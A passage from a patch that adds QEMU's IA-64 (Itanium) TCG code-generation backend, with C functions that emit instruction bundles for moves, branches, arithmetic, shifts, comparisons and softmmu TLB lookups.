tcg_out_movi(TCGContext *s, TCGType type, + TCGReg reg, tcg_target_long arg) +{ + tcg_out_bundle(s, mLX, + INSN_NOP_M, + tcg_opc_l2 (arg), + tcg_opc_x2 (TCG_REG_P0, OPC_MOVL_X2, reg, arg)); +} + +static void tcg_out_br(TCGContext *s, int label_index) +{ + TCGLabel *l = &s->labels[label_index]; + uint64_t imm; + + /* We pay attention here to not modify the branch target by reading + the existing value and using it again. 
This ensure that caches and + memory are kept coherent during retranslation. */ + if (l->has_value) { + imm = l->u.value_ptr - s->code_ptr; + } else { + imm = get_reloc_pcrel21b_slot2(s->code_ptr); + tcg_out_reloc(s, s->code_ptr, R_IA64_PCREL21B, label_index, 0); + } + + tcg_out_bundle(s, mmB, + INSN_NOP_M, + INSN_NOP_M, + tcg_opc_b1(TCG_REG_P0, OPC_BR_SPTK_MANY_B1, imm)); +} + +static inline void tcg_out_call(TCGContext *s, tcg_insn_unit *desc) +{ + uintptr_t func = desc->lo, gp = desc->hi, disp; + + /* Look through the function descriptor. */ + tcg_out_bundle(s, mlx, + INSN_NOP_M, + tcg_opc_l2 (gp), + tcg_opc_x2 (TCG_REG_P0, OPC_MOVL_X2, TCG_REG_R1, gp)); + disp = (tcg_insn_unit *)func - s->code_ptr; + tcg_out_bundle(s, mLX, + INSN_NOP_M, + tcg_opc_l4 (disp), + tcg_opc_x4 (TCG_REG_P0, OPC_BRL_CALL_SPTK_MANY_X4, + TCG_REG_B0, disp)); +} + +static void tcg_out_exit_tb(TCGContext *s, tcg_target_long arg) +{ + uint64_t imm, opc1; + + /* At least arg == 0 is a common operation. */ + if (arg == sextract64(arg, 0, 22)) { + opc1 = tcg_opc_movi_a(TCG_REG_P0, TCG_REG_R8, arg); + } else { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R8, arg); + opc1 = INSN_NOP_M; + } + + imm = tb_ret_addr - s->code_ptr; + + tcg_out_bundle(s, mLX, + opc1, + tcg_opc_l3 (imm), + tcg_opc_x3 (TCG_REG_P0, OPC_BRL_SPTK_MANY_X3, imm)); +} + +static inline void tcg_out_goto_tb(TCGContext *s, TCGArg arg) +{ + if (s->tb_jmp_offset) { + /* direct jump method */ + tcg_abort(); + } else { + /* indirect jump method */ + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R2, + (tcg_target_long)(s->tb_next + arg)); + tcg_out_bundle(s, MmI, + tcg_opc_m1 (TCG_REG_P0, OPC_LD8_M1, + TCG_REG_R2, TCG_REG_R2), + INSN_NOP_M, + tcg_opc_i21(TCG_REG_P0, OPC_MOV_I21, TCG_REG_B6, + TCG_REG_R2, 0)); + tcg_out_bundle(s, mmB, + INSN_NOP_M, + INSN_NOP_M, + tcg_opc_b4 (TCG_REG_P0, OPC_BR_SPTK_MANY_B4, + TCG_REG_B6)); + } + s->tb_next_offset[arg] = tcg_current_code_size(s); +} + +static inline void tcg_out_jmp(TCGContext *s, TCGArg addr) +{ + 
tcg_out_bundle(s, mmI, + INSN_NOP_M, + INSN_NOP_M, + tcg_opc_i21(TCG_REG_P0, OPC_MOV_I21, TCG_REG_B6, addr, 0)); + tcg_out_bundle(s, mmB, + INSN_NOP_M, + INSN_NOP_M, + tcg_opc_b4(TCG_REG_P0, OPC_BR_SPTK_MANY_B4, TCG_REG_B6)); +} + +static inline void tcg_out_ld_rel(TCGContext *s, uint64_t opc_m4, TCGArg arg, + TCGArg arg1, tcg_target_long arg2) +{ + if (arg2 == ((int16_t)arg2 >> 2) << 2) { + tcg_out_bundle(s, MmI, + tcg_opc_a4(TCG_REG_P0, OPC_ADDS_A4, + TCG_REG_R2, arg2, arg1), + tcg_opc_m1 (TCG_REG_P0, opc_m4, arg, TCG_REG_R2), + INSN_NOP_I); + } else { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R2, arg2); + tcg_out_bundle(s, MmI, + tcg_opc_a1 (TCG_REG_P0, OPC_ADD_A1, + TCG_REG_R2, TCG_REG_R2, arg1), + tcg_opc_m1 (TCG_REG_P0, opc_m4, arg, TCG_REG_R2), + INSN_NOP_I); + } +} + +static inline void tcg_out_st_rel(TCGContext *s, uint64_t opc_m4, TCGArg arg, + TCGArg arg1, tcg_target_long arg2) +{ + if (arg2 == ((int16_t)arg2 >> 2) << 2) { + tcg_out_bundle(s, MmI, + tcg_opc_a4(TCG_REG_P0, OPC_ADDS_A4, + TCG_REG_R2, arg2, arg1), + tcg_opc_m4 (TCG_REG_P0, opc_m4, arg, TCG_REG_R2), + INSN_NOP_I); + } else { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R2, arg2); + tcg_out_bundle(s, MmI, + tcg_opc_a1 (TCG_REG_P0, OPC_ADD_A1, + TCG_REG_R2, TCG_REG_R2, arg1), + tcg_opc_m4 (TCG_REG_P0, opc_m4, arg, TCG_REG_R2), + INSN_NOP_I); + } +} + +static inline void tcg_out_ld(TCGContext *s, TCGType type, TCGReg arg, + TCGReg arg1, intptr_t arg2) +{ + if (type == TCG_TYPE_I32) { + tcg_out_ld_rel(s, OPC_LD4_M1, arg, arg1, arg2); + } else { + tcg_out_ld_rel(s, OPC_LD8_M1, arg, arg1, arg2); + } +} + +static inline void tcg_out_st(TCGContext *s, TCGType type, TCGReg arg, + TCGReg arg1, intptr_t arg2) +{ + if (type == TCG_TYPE_I32) { + tcg_out_st_rel(s, OPC_ST4_M4, arg, arg1, arg2); + } else { + tcg_out_st_rel(s, OPC_ST8_M4, arg, arg1, arg2); + } +} + +static inline void tcg_out_alu(TCGContext *s, uint64_t opc_a1, uint64_t opc_a3, + TCGReg ret, TCGArg arg1, int const_arg1, + TCGArg arg2, int 
const_arg2) +{ + uint64_t opc1 = 0, opc2 = 0, opc3 = 0; + + if (const_arg2 && arg2 != 0) { + opc2 = tcg_opc_movi_a(TCG_REG_P0, TCG_REG_R3, arg2); + arg2 = TCG_REG_R3; + } + if (const_arg1 && arg1 != 0) { + if (opc_a3 && arg1 == (int8_t)arg1) { + opc3 = tcg_opc_a3(TCG_REG_P0, opc_a3, ret, arg1, arg2); + } else { + opc1 = tcg_opc_movi_a(TCG_REG_P0, TCG_REG_R2, arg1); + arg1 = TCG_REG_R2; + } + } + if (opc3 == 0) { + opc3 = tcg_opc_a1(TCG_REG_P0, opc_a1, ret, arg1, arg2); + } + + tcg_out_bundle(s, (opc1 || opc2 ? mII : miI), + opc1 ? opc1 : INSN_NOP_M, + opc2 ? opc2 : INSN_NOP_I, + opc3); +} + +static inline void tcg_out_add(TCGContext *s, TCGReg ret, TCGReg arg1, + TCGArg arg2, int const_arg2) +{ + if (const_arg2 && arg2 == sextract64(arg2, 0, 14)) { + tcg_out_bundle(s, mmI, + INSN_NOP_M, + INSN_NOP_M, + tcg_opc_a4(TCG_REG_P0, OPC_ADDS_A4, ret, arg2, arg1)); + } else { + tcg_out_alu(s, OPC_ADD_A1, 0, ret, arg1, 0, arg2, const_arg2); + } +} + +static inline void tcg_out_sub(TCGContext *s, TCGReg ret, TCGArg arg1, + int const_arg1, TCGArg arg2, int const_arg2) +{ + if (!const_arg1 && const_arg2 && -arg2 == sextract64(-arg2, 0, 14)) { + tcg_out_bundle(s, mmI, + INSN_NOP_M, + INSN_NOP_M, + tcg_opc_a4(TCG_REG_P0, OPC_ADDS_A4, ret, -arg2, arg1)); + } else { + tcg_out_alu(s, OPC_SUB_A1, OPC_SUB_A3, ret, + arg1, const_arg1, arg2, const_arg2); + } +} + +static inline void tcg_out_eqv(TCGContext *s, TCGArg ret, + TCGArg arg1, int const_arg1, + TCGArg arg2, int const_arg2) +{ + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_a1 (TCG_REG_P0, OPC_XOR_A1, ret, arg1, arg2), + tcg_opc_a3 (TCG_REG_P0, OPC_ANDCM_A3, ret, -1, ret)); +} + +static inline void tcg_out_nand(TCGContext *s, TCGArg ret, + TCGArg arg1, int const_arg1, + TCGArg arg2, int const_arg2) +{ + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_a1 (TCG_REG_P0, OPC_AND_A1, ret, arg1, arg2), + tcg_opc_a3 (TCG_REG_P0, OPC_ANDCM_A3, ret, -1, ret)); +} + +static inline void tcg_out_nor(TCGContext *s, TCGArg ret, + TCGArg arg1, 
int const_arg1, + TCGArg arg2, int const_arg2) +{ + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_a1 (TCG_REG_P0, OPC_OR_A1, ret, arg1, arg2), + tcg_opc_a3 (TCG_REG_P0, OPC_ANDCM_A3, ret, -1, ret)); +} + +static inline void tcg_out_orc(TCGContext *s, TCGArg ret, + TCGArg arg1, int const_arg1, + TCGArg arg2, int const_arg2) +{ + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_a3 (TCG_REG_P0, OPC_ANDCM_A3, TCG_REG_R2, -1, arg2), + tcg_opc_a1 (TCG_REG_P0, OPC_OR_A1, ret, arg1, TCG_REG_R2)); +} + +static inline void tcg_out_mul(TCGContext *s, TCGArg ret, + TCGArg arg1, TCGArg arg2) +{ + tcg_out_bundle(s, mmI, + tcg_opc_m18(TCG_REG_P0, OPC_SETF_SIG_M18, TCG_REG_F6, arg1), + tcg_opc_m18(TCG_REG_P0, OPC_SETF_SIG_M18, TCG_REG_F7, arg2), + INSN_NOP_I); + tcg_out_bundle(s, mmF, + INSN_NOP_M, + INSN_NOP_M, + tcg_opc_f2 (TCG_REG_P0, OPC_XMA_L_F2, TCG_REG_F6, TCG_REG_F6, + TCG_REG_F7, TCG_REG_F0)); + tcg_out_bundle(s, miI, + tcg_opc_m19(TCG_REG_P0, OPC_GETF_SIG_M19, ret, TCG_REG_F6), + INSN_NOP_I, + INSN_NOP_I); +} + +static inline void tcg_out_sar_i32(TCGContext *s, TCGArg ret, TCGArg arg1, + TCGArg arg2, int const_arg2) +{ + if (const_arg2) { + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_i11(TCG_REG_P0, OPC_EXTR_I11, + ret, arg1, arg2, 31 - arg2)); + } else { + tcg_out_bundle(s, mII, + tcg_opc_a3 (TCG_REG_P0, OPC_AND_A3, + TCG_REG_R3, 0x1f, arg2), + tcg_opc_i29(TCG_REG_P0, OPC_SXT4_I29, TCG_REG_R2, arg1), + tcg_opc_i5 (TCG_REG_P0, OPC_SHR_I5, ret, + TCG_REG_R2, TCG_REG_R3)); + } +} + +static inline void tcg_out_sar_i64(TCGContext *s, TCGArg ret, TCGArg arg1, + TCGArg arg2, int const_arg2) +{ + if (const_arg2) { + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_i11(TCG_REG_P0, OPC_EXTR_I11, + ret, arg1, arg2, 63 - arg2)); + } else { + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_i5 (TCG_REG_P0, OPC_SHR_I5, ret, arg1, arg2)); + } +} + +static inline void tcg_out_shl_i32(TCGContext *s, TCGArg ret, TCGArg arg1, + TCGArg arg2, int 
const_arg2) +{ + if (const_arg2) { + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_i12(TCG_REG_P0, OPC_DEP_Z_I12, ret, + arg1, 63 - arg2, 31 - arg2)); + } else { + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_a3 (TCG_REG_P0, OPC_AND_A3, TCG_REG_R2, + 0x1f, arg2), + tcg_opc_i7 (TCG_REG_P0, OPC_SHL_I7, ret, + arg1, TCG_REG_R2)); + } +} + +static inline void tcg_out_shl_i64(TCGContext *s, TCGArg ret, TCGArg arg1, + TCGArg arg2, int const_arg2) +{ + if (const_arg2) { + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_i12(TCG_REG_P0, OPC_DEP_Z_I12, ret, + arg1, 63 - arg2, 63 - arg2)); + } else { + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_i7 (TCG_REG_P0, OPC_SHL_I7, ret, + arg1, arg2)); + } +} + +static inline void tcg_out_shr_i32(TCGContext *s, TCGArg ret, TCGArg arg1, + TCGArg arg2, int const_arg2) +{ + if (const_arg2) { + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_i11(TCG_REG_P0, OPC_EXTR_U_I11, ret, + arg1, arg2, 31 - arg2)); + } else { + tcg_out_bundle(s, mII, + tcg_opc_a3 (TCG_REG_P0, OPC_AND_A3, TCG_REG_R3, + 0x1f, arg2), + tcg_opc_i29(TCG_REG_P0, OPC_ZXT4_I29, TCG_REG_R2, arg1), + tcg_opc_i5 (TCG_REG_P0, OPC_SHR_U_I5, ret, + TCG_REG_R2, TCG_REG_R3)); + } +} + +static inline void tcg_out_shr_i64(TCGContext *s, TCGArg ret, TCGArg arg1, + TCGArg arg2, int const_arg2) +{ + if (const_arg2) { + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_i11(TCG_REG_P0, OPC_EXTR_U_I11, ret, + arg1, arg2, 63 - arg2)); + } else { + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_i5 (TCG_REG_P0, OPC_SHR_U_I5, ret, + arg1, arg2)); + } +} + +static inline void tcg_out_rotl_i32(TCGContext *s, TCGArg ret, TCGArg arg1, + TCGArg arg2, int const_arg2) +{ + if (const_arg2) { + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_i2 (TCG_REG_P0, OPC_UNPACK4_L_I2, + TCG_REG_R2, arg1, arg1), + tcg_opc_i11(TCG_REG_P0, OPC_EXTR_U_I11, ret, + TCG_REG_R2, 32 - arg2, 31)); + } else { + tcg_out_bundle(s, miI, + 
INSN_NOP_M, + tcg_opc_i2 (TCG_REG_P0, OPC_UNPACK4_L_I2, + TCG_REG_R2, arg1, arg1), + tcg_opc_a3 (TCG_REG_P0, OPC_AND_A3, TCG_REG_R3, + 0x1f, arg2)); + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_a3 (TCG_REG_P0, OPC_SUB_A3, TCG_REG_R3, + 0x20, TCG_REG_R3), + tcg_opc_i5 (TCG_REG_P0, OPC_SHR_U_I5, ret, + TCG_REG_R2, TCG_REG_R3)); + } +} + +static inline void tcg_out_rotl_i64(TCGContext *s, TCGArg ret, TCGArg arg1, + TCGArg arg2, int const_arg2) +{ + if (const_arg2) { + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_i10(TCG_REG_P0, OPC_SHRP_I10, ret, arg1, + arg1, 0x40 - arg2)); + } else { + tcg_out_bundle(s, mII, + tcg_opc_a3 (TCG_REG_P0, OPC_SUB_A3, TCG_REG_R2, + 0x40, arg2), + tcg_opc_i7 (TCG_REG_P0, OPC_SHL_I7, TCG_REG_R3, + arg1, arg2), + tcg_opc_i5 (TCG_REG_P0, OPC_SHR_U_I5, TCG_REG_R2, + arg1, TCG_REG_R2)); + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_a1 (TCG_REG_P0, OPC_OR_A1, ret, + TCG_REG_R2, TCG_REG_R3)); + } +} + +static inline void tcg_out_rotr_i32(TCGContext *s, TCGArg ret, TCGArg arg1, + TCGArg arg2, int const_arg2) +{ + if (const_arg2) { + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_i2 (TCG_REG_P0, OPC_UNPACK4_L_I2, + TCG_REG_R2, arg1, arg1), + tcg_opc_i11(TCG_REG_P0, OPC_EXTR_U_I11, ret, + TCG_REG_R2, arg2, 31)); + } else { + tcg_out_bundle(s, mII, + tcg_opc_a3 (TCG_REG_P0, OPC_AND_A3, TCG_REG_R3, + 0x1f, arg2), + tcg_opc_i2 (TCG_REG_P0, OPC_UNPACK4_L_I2, + TCG_REG_R2, arg1, arg1), + tcg_opc_i5 (TCG_REG_P0, OPC_SHR_U_I5, ret, + TCG_REG_R2, TCG_REG_R3)); + } +} + +static inline void tcg_out_rotr_i64(TCGContext *s, TCGArg ret, TCGArg arg1, + TCGArg arg2, int const_arg2) +{ + if (const_arg2) { + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_i10(TCG_REG_P0, OPC_SHRP_I10, ret, arg1, + arg1, arg2)); + } else { + tcg_out_bundle(s, mII, + tcg_opc_a3 (TCG_REG_P0, OPC_SUB_A3, TCG_REG_R2, + 0x40, arg2), + tcg_opc_i5 (TCG_REG_P0, OPC_SHR_U_I5, TCG_REG_R3, + arg1, arg2), + tcg_opc_i7 (TCG_REG_P0, OPC_SHL_I7, 
TCG_REG_R2, + arg1, TCG_REG_R2)); + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_a1 (TCG_REG_P0, OPC_OR_A1, ret, + TCG_REG_R2, TCG_REG_R3)); + } +} + +static const uint64_t opc_ext_i29[8] = { + OPC_ZXT1_I29, OPC_ZXT2_I29, OPC_ZXT4_I29, 0, + OPC_SXT1_I29, OPC_SXT2_I29, OPC_SXT4_I29, 0 +}; + +static inline uint64_t tcg_opc_ext_i(int qp, TCGMemOp opc, TCGReg d, TCGReg s) +{ + if ((opc & MO_SIZE) == MO_64) { + return tcg_opc_mov_a(qp, d, s); + } else { + return tcg_opc_i29(qp, opc_ext_i29[opc & MO_SSIZE], d, s); + } +} + +static inline void tcg_out_ext(TCGContext *s, uint64_t opc_i29, + TCGArg ret, TCGArg arg) +{ + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_i29(TCG_REG_P0, opc_i29, ret, arg)); +} + +static inline uint64_t tcg_opc_bswap64_i(int qp, TCGReg d, TCGReg s) +{ + return tcg_opc_i3(qp, OPC_MUX1_I3, d, s, 0xb); +} + +static inline void tcg_out_bswap16(TCGContext *s, TCGArg ret, TCGArg arg) +{ + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_i12(TCG_REG_P0, OPC_DEP_Z_I12, ret, arg, 15, 15), + tcg_opc_bswap64_i(TCG_REG_P0, ret, ret)); +} + +static inline void tcg_out_bswap32(TCGContext *s, TCGArg ret, TCGArg arg) +{ + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_i12(TCG_REG_P0, OPC_DEP_Z_I12, ret, arg, 31, 31), + tcg_opc_bswap64_i(TCG_REG_P0, ret, ret)); +} + +static inline void tcg_out_bswap64(TCGContext *s, TCGArg ret, TCGArg arg) +{ + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_bswap64_i(TCG_REG_P0, ret, arg)); +} + +static inline void tcg_out_deposit(TCGContext *s, TCGArg ret, TCGArg a1, + TCGArg a2, int const_a2, int pos, int len) +{ + uint64_t i1 = 0, i2 = 0; + int cpos = 63 - pos, lm1 = len - 1; + + if (const_a2) { + /* Truncate the value of a constant a2 to the width of the field. */ + int mask = (1u << len) - 1; + a2 &= mask; + + if (a2 == 0 || a2 == mask) { + /* 1-bit signed constant inserted into register. 
*/ + i2 = tcg_opc_i14(TCG_REG_P0, OPC_DEP_I14, ret, a2, a1, cpos, lm1); + } else { + /* Otherwise, load any constant into a temporary. Do this into + the first I slot to help out with cross-unit delays. */ + i1 = tcg_opc_movi_a(TCG_REG_P0, TCG_REG_R2, a2); + a2 = TCG_REG_R2; + } + } + if (i2 == 0) { + i2 = tcg_opc_i15(TCG_REG_P0, OPC_DEP_I15, ret, a2, a1, cpos, lm1); + } + tcg_out_bundle(s, (i1 ? mII : miI), + INSN_NOP_M, + i1 ? i1 : INSN_NOP_I, + i2); +} + +static inline uint64_t tcg_opc_cmp_a(int qp, TCGCond cond, TCGArg arg1, + TCGArg arg2, int cmp4) +{ + uint64_t opc_eq_a6, opc_lt_a6, opc_ltu_a6; + + if (cmp4) { + opc_eq_a6 = OPC_CMP4_EQ_A6; + opc_lt_a6 = OPC_CMP4_LT_A6; + opc_ltu_a6 = OPC_CMP4_LTU_A6; + } else { + opc_eq_a6 = OPC_CMP_EQ_A6; + opc_lt_a6 = OPC_CMP_LT_A6; + opc_ltu_a6 = OPC_CMP_LTU_A6; + } + + switch (cond) { + case TCG_COND_EQ: + return tcg_opc_a6 (qp, opc_eq_a6, TCG_REG_P6, TCG_REG_P7, arg1, arg2); + case TCG_COND_NE: + return tcg_opc_a6 (qp, opc_eq_a6, TCG_REG_P7, TCG_REG_P6, arg1, arg2); + case TCG_COND_LT: + return tcg_opc_a6 (qp, opc_lt_a6, TCG_REG_P6, TCG_REG_P7, arg1, arg2); + case TCG_COND_LTU: + return tcg_opc_a6 (qp, opc_ltu_a6, TCG_REG_P6, TCG_REG_P7, arg1, arg2); + case TCG_COND_GE: + return tcg_opc_a6 (qp, opc_lt_a6, TCG_REG_P7, TCG_REG_P6, arg1, arg2); + case TCG_COND_GEU: + return tcg_opc_a6 (qp, opc_ltu_a6, TCG_REG_P7, TCG_REG_P6, arg1, arg2); + case TCG_COND_LE: + return tcg_opc_a6 (qp, opc_lt_a6, TCG_REG_P7, TCG_REG_P6, arg2, arg1); + case TCG_COND_LEU: + return tcg_opc_a6 (qp, opc_ltu_a6, TCG_REG_P7, TCG_REG_P6, arg2, arg1); + case TCG_COND_GT: + return tcg_opc_a6 (qp, opc_lt_a6, TCG_REG_P6, TCG_REG_P7, arg2, arg1); + case TCG_COND_GTU: + return tcg_opc_a6 (qp, opc_ltu_a6, TCG_REG_P6, TCG_REG_P7, arg2, arg1); + default: + tcg_abort(); + break; + } +} + +static inline void tcg_out_brcond(TCGContext *s, TCGCond cond, TCGReg arg1, + TCGReg arg2, int label_index, int cmp4) +{ + TCGLabel *l = &s->labels[label_index]; + uint64_t 
imm; + + /* We pay attention here to not modify the branch target by reading + the existing value and using it again. This ensure that caches and + memory are kept coherent during retranslation. */ + if (l->has_value) { + imm = l->u.value_ptr - s->code_ptr; + } else { + imm = get_reloc_pcrel21b_slot2(s->code_ptr); + tcg_out_reloc(s, s->code_ptr, R_IA64_PCREL21B, label_index, 0); + } + + tcg_out_bundle(s, miB, + INSN_NOP_M, + tcg_opc_cmp_a(TCG_REG_P0, cond, arg1, arg2, cmp4), + tcg_opc_b1(TCG_REG_P6, OPC_BR_DPTK_FEW_B1, imm)); +} + +static inline void tcg_out_setcond(TCGContext *s, TCGCond cond, TCGArg ret, + TCGArg arg1, TCGArg arg2, int cmp4) +{ + tcg_out_bundle(s, MmI, + tcg_opc_cmp_a(TCG_REG_P0, cond, arg1, arg2, cmp4), + tcg_opc_movi_a(TCG_REG_P6, ret, 1), + tcg_opc_movi_a(TCG_REG_P7, ret, 0)); +} + +static inline void tcg_out_movcond(TCGContext *s, TCGCond cond, TCGArg ret, + TCGArg c1, TCGArg c2, + TCGArg v1, int const_v1, + TCGArg v2, int const_v2, int cmp4) +{ + uint64_t opc1, opc2; + + if (const_v1) { + opc1 = tcg_opc_movi_a(TCG_REG_P6, ret, v1); + } else if (ret == v1) { + opc1 = INSN_NOP_M; + } else { + opc1 = tcg_opc_mov_a(TCG_REG_P6, ret, v1); + } + if (const_v2) { + opc2 = tcg_opc_movi_a(TCG_REG_P7, ret, v2); + } else if (ret == v2) { + opc2 = INSN_NOP_I; + } else { + opc2 = tcg_opc_mov_a(TCG_REG_P7, ret, v2); + } + + tcg_out_bundle(s, MmI, + tcg_opc_cmp_a(TCG_REG_P0, cond, c1, c2, cmp4), + opc1, + opc2); +} + +#if defined(CONFIG_SOFTMMU) +/* We're expecting to use an signed 22-bit immediate add. */ +QEMU_BUILD_BUG_ON(offsetof(CPUArchState, tlb_table[NB_MMU_MODES - 1][1]) + > 0x1fffff) + +/* Load and compare a TLB entry, and return the result in (p6, p7). + R2 is loaded with the addend TLB entry. + R57 is loaded with the address, zero extented on 32-bit targets. + R1, R3 are clobbered, leaving R56 free for... + BSWAP_1, BSWAP_2 and I-slot insns for swapping data for store. 
*/ +static inline void tcg_out_qemu_tlb(TCGContext *s, TCGReg addr_reg, + TCGMemOp s_bits, int off_rw, int off_add, + uint64_t bswap1, uint64_t bswap2) +{ + /* + .mii + mov r2 = off_rw + extr.u r3 = addr_reg, ... # extract tlb page + zxt4 r57 = addr_reg # or mov for 64-bit guest + ;; + .mii + addl r2 = r2, areg0 + shl r3 = r3, cteb # via dep.z + dep r1 = 0, r57, ... # zero page ofs, keep align + ;; + .mmi + add r2 = r2, r3 + ;; + ld4 r3 = [r2], off_add-off_rw # or ld8 for 64-bit guest + nop + ;; + .mmi + nop + cmp.eq p6, p7 = r3, r58 + nop + ;; + */ + tcg_out_bundle(s, miI, + tcg_opc_movi_a(TCG_REG_P0, TCG_REG_R2, off_rw), + tcg_opc_i11(TCG_REG_P0, OPC_EXTR_U_I11, TCG_REG_R3, + addr_reg, TARGET_PAGE_BITS, CPU_TLB_BITS - 1), + tcg_opc_ext_i(TCG_REG_P0, + TARGET_LONG_BITS == 32 ? MO_UL : MO_Q, + TCG_REG_R57, addr_reg)); + tcg_out_bundle(s, miI, + tcg_opc_a1 (TCG_REG_P0, OPC_ADD_A1, TCG_REG_R2, + TCG_REG_R2, TCG_AREG0), + tcg_opc_i12(TCG_REG_P0, OPC_DEP_Z_I12, TCG_REG_R3, + TCG_REG_R3, 63 - CPU_TLB_ENTRY_BITS, + 63 - CPU_TLB_ENTRY_BITS), + tcg_opc_i14(TCG_REG_P0, OPC_DEP_I14, TCG_REG_R1, 0, + TCG_REG_R57, 63 - s_bits, + TARGET_PAGE_BITS - s_bits - 1)); + tcg_out_bundle(s, MmI, + tcg_opc_a1 (TCG_REG_P0, OPC_ADD_A1, + TCG_REG_R2, TCG_REG_R2, TCG_REG_R3), + tcg_opc_m3 (TCG_REG_P0, + (TARGET_LONG_BITS == 32 + ? 
OPC_LD4_M3 : OPC_LD8_M3), TCG_REG_R3, + TCG_REG_R2, off_add - off_rw), + bswap1); + tcg_out_bundle(s, mmI, + tcg_opc_m1 (TCG_REG_P0, OPC_LD8_M1, TCG_REG_R2, TCG_REG_R2), + tcg_opc_a6 (TCG_REG_P0, OPC_CMP_EQ_A6, TCG_REG_P6, + TCG_REG_P7, TCG_REG_R1, TCG_REG_R3), + bswap2); +} + +#define TCG_MAX_QEMU_LDST 640 + +typedef struct TCGLabelQemuLdst { + bool is_ld; + TCGMemOp size; + tcg_insn_unit *label_ptr; /* label pointers to be updated */ +} TCGLabelQemuLdst; + +typedef struct TCGBackendData { + int nb_ldst_labels; + TCGLabelQemuLdst ldst_labels[TCG_MAX_QEMU_LDST]; +} TCGBackendData; + +static inline void tcg_out_tb_init(TCGContext *s) +{ + s->be->nb_ldst_labels = 0; +} + +static void add_qemu_ldst_label(TCGContext *s, bool is_ld, TCGMemOp opc, + tcg_insn_unit *label_ptr) +{ + TCGBackendData *be = s->be; + TCGLabelQemuLdst *l = &be->ldst_labels[be->nb_ldst_labels++]; + + assert(be->nb_ldst_labels <= TCG_MAX_QEMU_LDST); + l->is_ld = is_ld; + l->size = opc & MO_SIZE; + l->label_ptr = label_ptr; +} + +static void tcg_out_tb_finalize(TCGContext *s) +{ + static const void * const helpers[8] = { + helper_ret_stb_mmu, + helper_le_stw_mmu, + helper_le_stl_mmu, + helper_le_stq_mmu, + helper_ret_ldub_mmu, + helper_le_lduw_mmu, + helper_le_ldul_mmu, + helper_le_ldq_mmu, + }; + tcg_insn_unit *thunks[8] = { }; + TCGBackendData *be = s->be; + size_t i, n = be->nb_ldst_labels; + + for (i = 0; i < n; i++) { + TCGLabelQemuLdst *l = &be->ldst_labels[i]; + long x = l->is_ld * 4 + l->size; + tcg_insn_unit *dest = thunks[x]; + + /* The out-of-line thunks are all the same; load the return address + from B0, load the GP, and branch to the code. Note that we are + always post-call, so the register window has rolled, so we're + using incomming parameter register numbers, not outgoing. 
*/ + if (dest == NULL) { + uintptr_t *desc = (uintptr_t *)helpers[x]; + uintptr_t func = desc[0], gp = desc[1], disp; + + thunks[x] = dest = s->code_ptr; + + tcg_out_bundle(s, mlx, + INSN_NOP_M, + tcg_opc_l2 (gp), + tcg_opc_x2 (TCG_REG_P0, OPC_MOVL_X2, + TCG_REG_R1, gp)); + tcg_out_bundle(s, mii, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_i22(TCG_REG_P0, OPC_MOV_I22, + l->is_ld ? TCG_REG_R35 : TCG_REG_R36, + TCG_REG_B0)); + disp = (tcg_insn_unit *)func - s->code_ptr; + tcg_out_bundle(s, mLX, + INSN_NOP_M, + tcg_opc_l3 (disp), + tcg_opc_x3 (TCG_REG_P0, OPC_BRL_SPTK_MANY_X3, disp)); + } + + reloc_pcrel21b_slot2(l->label_ptr, dest); + } +} + +static inline void tcg_out_qemu_ld(TCGContext *s, const TCGArg *args) +{ + static const uint64_t opc_ld_m1[4] = { + OPC_LD1_M1, OPC_LD2_M1, OPC_LD4_M1, OPC_LD8_M1 + }; + int addr_reg, data_reg, mem_index; + TCGMemOp opc, s_bits; + uint64_t fin1, fin2; + tcg_insn_unit *label_ptr; + + data_reg = args[0]; + addr_reg = args[1]; + opc = args[2]; + mem_index = args[3]; + s_bits = opc & MO_SIZE; + + /* Read the TLB entry */ + tcg_out_qemu_tlb(s, addr_reg, s_bits, + offsetof(CPUArchState, tlb_table[mem_index][0].addr_read), + offsetof(CPUArchState, tlb_table[mem_index][0].addend), + INSN_NOP_I, INSN_NOP_I); + + /* P6 is the fast path, and P7 the slow path */ + + fin2 = 0; + if (opc & MO_BSWAP) { + fin1 = tcg_opc_bswap64_i(TCG_REG_P0, data_reg, TCG_REG_R8); + if (s_bits < MO_64) { + int shift = 64 - (8 << s_bits); + fin2 = (opc & MO_SIGN ? 
